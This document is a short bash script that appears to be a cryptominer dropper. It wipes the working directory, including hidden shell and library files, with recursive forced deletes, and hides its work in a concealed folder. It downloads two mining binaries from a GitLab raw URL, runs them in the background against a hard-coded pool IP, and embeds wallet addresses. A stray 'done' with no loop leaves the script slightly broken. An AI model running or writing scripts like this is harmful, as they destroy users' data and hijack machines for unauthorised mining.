#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod u+x cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u uskcyTKwSgL3SrLYkFLpWWhDv6Fq6xkxUc.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.84
chmod u+x lol1.84

./lol1.84 -a PYRIN -p 138.197.98.18:80 -u pyrin:qrhfsxqg4006ac4zlpun39uq96agy7peyxkm0vjzrsagwzu9qsyyws5mjymd3.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
